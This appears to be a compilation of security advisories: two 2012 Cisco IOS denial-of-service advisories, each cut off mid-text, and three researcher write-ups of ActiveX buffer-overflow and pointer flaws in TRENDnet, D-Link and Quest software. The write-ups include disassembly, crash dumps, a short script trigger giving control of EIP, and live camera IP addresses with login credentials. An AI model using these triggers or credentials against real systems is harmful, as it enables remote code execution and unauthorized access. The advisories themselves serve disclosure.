-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Cisco Security Advisory: Multiple Vulnerabilities in Cisco IOS Software Traffic Optimization Features Advisory ID: cisco-sa-20120328-mace Revision 1.0 For Public Release 2012 March 28 16:00 UTC (GMT) + Summary === Cisco IOS Software contains a denial of service (DoS) vulnerability in the Wide Area Application Services (WAAS) Express feature that could allow an unauthenticated, remote attacker to cause the router to leak memory or to reload. Cisco IOS Software also contains a DoS vulnerability in the Measurement, Aggregation, and Correlation Engine (MACE) feature that could allow an unauthenticated, remote attacker to cause the router to reload. An attacker could exploit these vulnerabilities by sending transit traffic through a router configured with WAAS Express or MACE. Successful exploitation of these vulnerabilities could allow an unauthenticated, remote attacker to cause the router to leak memory or to reload. Repeated exploits could allow a sustained DoS condition. Cisco has released free software updates that address these vulnerabilities. This advisory is available at the following link: http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20120328-mace Note: The March 28, 2012, Cisco IOS Software Security Advisory bundled publication includes nine Cisco Security Advisories. Each advisory lists the Cisco IOS Software releases that correct the vulnerability or vulnerabilities detailed in the advisory as well as the Cisco IOS Software releases that correct all vulnerabilities in the March 2012 bundled publication. Individual publication links are in Cisco Event Response: Semi-Annual Cisco IOS Software Security Advisory Bundled Publication at the following link: http://www.cisco.com/web/about/security/intelligence/ Cisco_ERP_mar12.html Affected Products = Vulnerable Products +-- Cisco devices that are running Cisco IOS Software are vulnerable when they are configured with the mace enable or waas enable interface configuration commands on one or more interfaces. Additional configuration is required for WAAS Express or MACE to be configured; more details follow. Note: Cisco IOS Software is vulnerable only when configured for WAAS Express or MACE. Cisco IOS Software configured for WAAS, not WAAS Express, is not vulnerable. For more information on WAAS Express, see http://www.cisco.com/en/US/products/ps11211/index.html. For more information about MACE, see http://www.cisco.com/en/US/prod/collateral/netmgtsw/ps11709/ps11671/guide_c07-664643.html. To determine the Cisco IOS Software release that is running on a Cisco product, administrators can log in to the device and issue the show version command to display the system banner. The system banner confirms that the device is running Cisco IOS Software by displaying text similar to Cisco Internetwork Operating System Software or Cisco IOS Software. The image name displays in parentheses, followed by Version and the Cisco IOS Software release name. Other Cisco devices do not have the show version command or may provide different output. The following example identifies a Cisco product that is running Cisco IOS Software Release 15.0(1)M1 with an installed image name of C3900-UNIVERSALK9-M: Router show version Cisco IOS Software, C3900 Software (C3900-UNIVERSALK9-M), Version 15.0(1)M1, RELEASE SOFTWARE (fc1) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2009 by Cisco Systems, Inc. Compiled Wed 02-Dec-09 17:17 by prod_rel_team !--- output truncated Additional information about Cisco IOS Software release naming conventions is available in White Paper: Cisco IOS and NX-OS Software Reference Guide at http://www.cisco.com/web/about/security/intelligence/ios-ref.html. Products Confirmed Not Vulnerable + No other Cisco products are currently known to be affected by these vulnerabilities. Details === The Cisco Wide Area Application Services (WAAS) Express feature allows optimization of the WAN bandwidth required to access centrally located applications. WAAS Express allows the traffic to be optimized by a Cisco Integrated Services Router (ISR G2), with no other devices required. The Cisco Measurement, Aggregation, and Correlation Engine (MACE) is a Cisco IOS feature that is used for measurement and analysis of network traffic. The feature may be used with WAAS Express to give details of optimized traffic or used by itself to help measure application performance. Cisco IOS Software contains a DoS vulnerability in the WAAS Express feature that could allow an unauthenticated, remote attacker to cause the router to leak memory or to reload. This vulnerability is documented in Cisco bug ID CSCtt45381 and has been assigned Common Vulnerabilities and Exposures (CVE) ID CVE-2012-1314. Cisco IOS Software
Cisco Security Advisory: Cisco IOS Software Network Address Translation Vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Cisco Security Advisory: Cisco IOS Software Network Address Translation Vulnerability Advisory ID: cisco-sa-20120328-nat Revision 1.0 For Public Release 2012 March 28 16:00 UTC (GMT) + Summary === The Cisco IOS Software Network Address Translation (NAT) feature contains a denial of service (DoS) vulnerability in the translation of Session Initiation Protocol (SIP) packets. The vulnerability is caused when packets in transit on the vulnerable device require translation on the SIP payload. Cisco has released free software updates that address this vulnerability. A workaround that mitigates the vulnerability is available. This advisory is available at the following link: http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20120328-nat Note: The March 28, 2012, Cisco IOS Software Security Advisory bundled publication includes nine Cisco Security Advisories. Each advisory lists the Cisco IOS Software releases that correct the vulnerability or vulnerabilities detailed in the advisory as well as the Cisco IOS Software releases that correct all vulnerabilities in the March 2012 bundled publication. Individual publication links are in Cisco Event Response: Semi-Annual Cisco IOS Software Security Advisory Bundled Publication at the following link: http://www.cisco.com/web/about/security/intelligence/Cisco_ERP_mar12.html Affected Products = Vulnerable Products +-- Cisco devices that are running Cisco IOS Software are vulnerable when they are configured for NAT and contain support for NAT for Session Initiation Protocol. There are two methods to determine if a device is configured for NAT: * Determine if NAT is active on a running device. * Determine if NAT commands are included in the device configuration. Determine if NAT is Active on a Running Device +- The preferred method to verify whether NAT is enabled on a Cisco IOS device is to log in to the device and issue the show ip nat statistics command. If NAT is active, the sections Outside interfaces and Inside interfaces will each include at least one interface. The following example shows a device on which the NAT feature is active: Router#show ip nat statistics Total translations: 2 (0 static, 2 dynamic; 0 extended) Outside interfaces: Serial0 Inside interfaces: Ethernet1 Hits: 135 Misses: 5 Expired translations: 2 Dynamic mappings: -- Inside Source access-list 1 pool mypool refcount 2 pool mypool: netmask 255.255.255.0 start 192.168.10.1 end 192.168.10.254 type generic, total addresses 14, allocated 2 (14%), misses 0 Depending on the Cisco IOS Software release, the interface lists can be in the lines following the Outside interfaces and Inside interfaces. In releases that support the section filter on show commands, the administrator can determine whether NAT is active by using the show ip nat statistics | section interfaces command, as illustrated in the following example: Router show ip nat statistics | section interfaces Outside interfaces: GigabitEthernet0/0 Inside interfaces: GigabitEthernet0/1 Router Determine if NAT Commands are Included in the Device Configuration +- Alternatively, to determine whether NAT has been enabled in the Cisco IOS Software configuration, either the ip nat inside or ip nat outside commands must be present in different interfaces, or in the case of the NAT Virtual Interface, the ip nat enable interface command will be present. Determine the Cisco IOS Software Release +--- To determine the Cisco IOS Software release that is running on a Cisco product, administrators can log in to the device and issue the show version command to display the system banner. The system banner confirms that the device is running Cisco IOS Software by displaying text similar to Cisco Internetwork Operating System Software or Cisco IOS Software. The image name displays in parentheses, followed by Version and the Cisco IOS Software release name. Other Cisco devices do not have the show version command or may provide different output. The following example identifies a Cisco product that is running Cisco IOS Software Release 15.0(1)M1 with an installed image name of C3900-UNIVERSALK9-M: Router show version Cisco IOS Software, C3900 Software (C3900-UNIVERSALK9-M), Version 15.0(1)M1, RELEASE SOFTWARE (fc1) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2009 by Cisco Systems, Inc. Compiled Wed 02-Dec-09 17:17 by prod_rel_team !--- output truncated Additional information about Cisco IOS Software release naming conventions is available in White Paper: Cisco IOS and NX-OS Software
TRENDnet SecurView TV-IP121WN Wireless Internet Camera UltraMJCam ActiveX Control OpenFileDlg WideCharToMultiByte Remote Stack Buffer Overflow
TRENDnet SecurView TV-IP121WN Wireless Internet Camera UltraMJCam ActiveX
Control OpenFileDlg WideCharToMultiByte Remote Stack Buffer Overflow
camera demo
http://67.203.184.58:9193/admin/view.cgi?profile=0
username=guest
password=guest
Background:
The mentioned product, when browsing the device web interface,
asks to install an ActiveX control to stream video content.
It has the following settings:
File version: 1, 1, 52, 18
Product name: UltraMJCam device ActiveX Control
Binary path: C:\WINDOWS\Downloaded Program Files\UltraMJCamX.ocx
ProgID: UltraMJCam.UltraMJCam.1
CLSID: {707ABFC2-1D27-4a10-A6E4-6BE6BDF9FB11}
Implements IObjectSafety: yes
Safe for Scripting (IObjectSafety): True
Safe for Initialization (IObjectSafety): True
Vulnerability:
This ActiveX control exposed the vulnerable
OpenFileDlg() method, see typelib:
..
/* DISPID=101 */
/* VT_BSTR [8] */
function OpenFileDlg(
/* VT_BSTR [8] [in] */ $sFilter
)
{
/* method OpenFileDlg */
}
..
By invoking this method with an overlong argument is possible
to overflow a buffer. This is because of an insecure
WideCharToMultiByte() call inside UltraMJCamX.ocx:
Call stack of main thread
AddressStack Procedure / arguments
Called from Frame
001279FC 77E6F20B kernel32.77E637DE
kernel32.77E6F206 00127A0C
00127A10 0299F958 kernel32.WideCharToMultiByte
UltraMJC.0299F952 00127A0C
00127A14 0003 CodePage = 3
00127A18 Options = 0
00127A1C 03835C5C WideCharStr =
00127A20 WideCharCount = (-1.)
00127A24 00127A50 MultiByteStr = 00127A50
00127A28 7532 MultiByteCount = 7532 (30002.)
00127A2C pDefaultChar = NULL
00127A30 pDefaultCharUsed = NULL
00127A3C 029B11D0 UltraMJC.0299F920
UltraMJC.029B11CB 00127A38
..
0299F934 8B45 08 mov eax,dword ptr ss:[ebp+8]
0299F937 C600 00 mov byte ptr ds:[eax],0
0299F93A 6A 00push 0
0299F93C 6A 00push 0
0299F93E 8B4D 10 mov ecx,dword ptr ss:[ebp+10]
0299F941 51 push ecx
0299F942 8B55 08 mov edx,dword ptr ss:[ebp+8]
0299F945 52 push edx
0299F946 6A FFpush -1
0299F948 8B45 0C mov eax,dword ptr ss:[ebp+C]
0299F94B 50 push eax
0299F94C 6A 00push 0
0299F94E 8B4D 14 mov ecx,dword ptr ss:[ebp+14]
0299F951 51 push ecx
0299F952 FF15 20319F02call dword ptr ds:[KERNEL32.WideCharTo;
kernel32.WideCharToMultiByte
..
The result is that critical structures are overwritten (SEH)
allowing to execute arbitrary code against the target browser.
As attachment, basic proof of concept code.
original url: http://retrogod.altervista.org/9sg_trendnet_adv.htm
poc: http://retrogod.altervista.org/9sg_trendnet_poc.htm
Quest InTrust 10.4.x Annotation Objects ActiveX Control AnnotateX.dll Uninitialized Pointer Remote Code Execution
Quest InTrust 10.4.x Annotation Objects ActiveX Control AnnotateX.dll
Uninitialized Pointer Remote Code Execution
homepage: http://www.quest.com/intrust/
description: InTrust securely collects, stores, reports and
alerts on event log data from Windows, Unix and Linux systems,
helping you comply with external regulations, internal policies
and security best practices.
download url of a test version:
http://www.quest.com/downloads/
file tested: Quest_InTrust---Full-Package_104.zip
Background:
The mentioned product installs an ActiveX control
with the following settings:
binary path: C:\PROGRA~1\COMMON~1\SOFTWA~1\ANNOTA~1.DLL
CLSID: {EF600D71-358F-11D1-8FD4-00AA00BD091C}
ProgID: AnnotationX.AnnList.1
Implements IObjectSafety: Yes
Safe for Scripting (IObjectSafety): True
Safe for Initialization (IObjectSafety): True
According to the IObjectSafety interface it is
safe for scripting and safe for initialization, so
Internet Explorer will allow scripting of this control
from remote.
Vulnerability:
By invoking the Add() method is
possible to call inside a memory region of choice
set by the attacker through ex. heap spray or other
tecniques.
Example code:
object classid='clsid:EF600D71-358F-11D1-8FD4-00AA00BD091C' id='obj' /
/object
script
obj.Add(0x76767676,1);
/script
..
eax=76767676 ebx=4401e51c ecx=01f85340 edx= esi=01f85340 edi=0001
eip=4400ae62 esp=015fd134 ebp=015fd140 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=00010202
ANNOTA_1+0xae62:
4400ae62 ff1485504a0244 calldword ptr ANNOTA_1!DllUnregisterServer+0x19235
(44024a50)[eax*4] ds:0023:1ddc2428=
..
You are in control of eax: fully exploitable.
As attachment, proof of concept code.
original url: http://retrogod.altervista.org/9sg_quest_adv.htm
poc: http://retrogod.altervista.org/9sg_quest_poc.htm
D-Link SecuriCam DCS-5605 Network Surveillance ActiveX Control DcsCliCtrl.dll lstrcpyW Remote Buffer Overflow Vulnerability
D-Link SecuriCam DCS-5605 Network Surveillance ActiveX Control DcsCliCtrl.dll
lstrcpyW Remote Buffer Overflow Vulnerability
tested against: Microsoft Windows Server 2003 r2 sp2
Internet Explorer 7/8
Live demo: http://203.125.227.70/eng/index.cgi
username: dlink
password: dlink
product homepage: http://www.d-link.com/products/?pid=771
product description:
The DCS-5605 is a high performance camera for professional surveillance
and remote monitoring. This network camera features motorized pan,
tilt, and optical/digital zoom for ultimate versatility. The 10x optical
zoom lens delivers the level of detail necessary to identify faces, license
plate numbers, and other important details that are difficult to
clearly distinguish using digital zoom alone
background:
When browsing the device web interface, the user
is asked to install an ActiveX control to stream
video content. This control has the following settings:
Description: Camera Stream Client Control
File version: 1.0.0.4519
Binary path: C:\Program Files\NetworkSurveillanceAX\DcsCliCtrl.dll
ProgID: DcsCliCtrl.DCSStrmControl.1
GUID: {721700FE-7F0E-49C5-BDED-CA92B7CB1245}
Implements IObjectSafety: Yes
Safe For Scripting (IObjectSafety): True
Safe For Initialization (IObjectSafety): True
Vulnerability:
the ActiveX control exposes the SelectDirectory()
method which supports one optional argument.
See typelib:
..
/* DISPID=22 */
/* VT_BSTR [8] */
function SelectDirectory(
/* VT_VARIANT [12] [in] */ $varDefPath
)
{
/* method SelectDirectory */
}
..
This method suffers of a stack based buffer overflow vulnerability
because an unsafe lstrcpyW() call inside DcsCliCtrl.dll:
..
100712E0 81EC 3404sub esp,434
100712E6 A1 2C841010 mov eax,dword ptr ds:[1010842C]
100712EB 33C4 xor eax,esp
100712ED 898424 3004 mov dword ptr ss:[esp+430],eax
100712F4 53 push ebx
100712F5 8B9C24 4804 mov ebx,dword ptr ss:[esp+448]
100712FC 55 push ebp
100712FD 8BAC24 4004 mov ebp,dword ptr ss:[esp+440]
10071304 56 push esi
10071305 8BB424 4C04 mov esi,dword ptr ss:[esp+44C]
1007130C 57 push edi
1007130D 8BBC24 4C04 mov edi,dword ptr ss:[esp+44C]
10071314 68 0802 push 208
10071319 8D4424 34lea eax,dword ptr ss:[esp+34]
1007131D 6A 00push 0
1007131F 50 push eax
10071320 E8 0BC40300 call DcsCliCt.100AD730
10071325 83C4 0C add esp,0C
10071328 85F6 test esi,esi
1007132A 74 0Cje short DcsCliCt.10071338
1007132C 56 push esi
1007132D 8D4C24 34lea ecx,dword ptr ss:[esp+34]
10071331 51 push ecx
10071332 FF15 D4D20C10call dword ptr ds:[KERNEL32.lstrcpyW] ;
kernel32.lstrcpyW -
..
An attacker could entice a remote user to browse a web
page to gain control of the victim browser, by passing an overlong string to
the mentioned method and overwriting critical structures (SEH).
As attachment proof of concept code.
Note, to reproduce the wanted crash:
when the SelectDirectory() method is called the
user is asked to select a destination folder for the stream recorder.
To set EIP to 0x0c0c0c0c select a folder of choice, then proceed.
When clicking Cancel you have an unuseful crash, however it could be
possible that modifying the poc you will have EIP overwritten aswell.
I think that it is also possible that other products might carry this dll,
I could post an update if I find more.
Additional note:
0:029 lm -vm DcsCliCtrl
startendmodule name
0845 0859e000 DcsCliCtrl (deferred)
Image path: C:\Program Files\NetworkSurveillanceAX\DcsCliCtrl.dll
Image name: DcsCliCtrl.dll
Timestamp:Thu Aug 19 08:48:47 2010 (4C6CD3CF)
CheckSum: 001325EC
ImageSize:0014E000
File version: 1.0.0.4519
Product version: 1.0.0.1
File flags: 0 (Mask 3F)
File OS: 4 Unknown Win32
File type:2.0 Dll
File date:.
Translations: 0409.04e4
ProductName: Camera Streaming Client
InternalName: DcsCliCtrl.dll
OriginalFilename: DcsCliCtrl.dll
ProductVersion: 1.0.0.1
FileVersion: 1.0.0.4519
FileDescription: Camera Stream Client Control
LegalCopyright: Copyright: (c) All rights reserved.
original url: http://retrogod.altervista.org/9sg_dlink_adv.htm
poc: http://retrogod.altervista.org/9sg_dlink_poc.htm
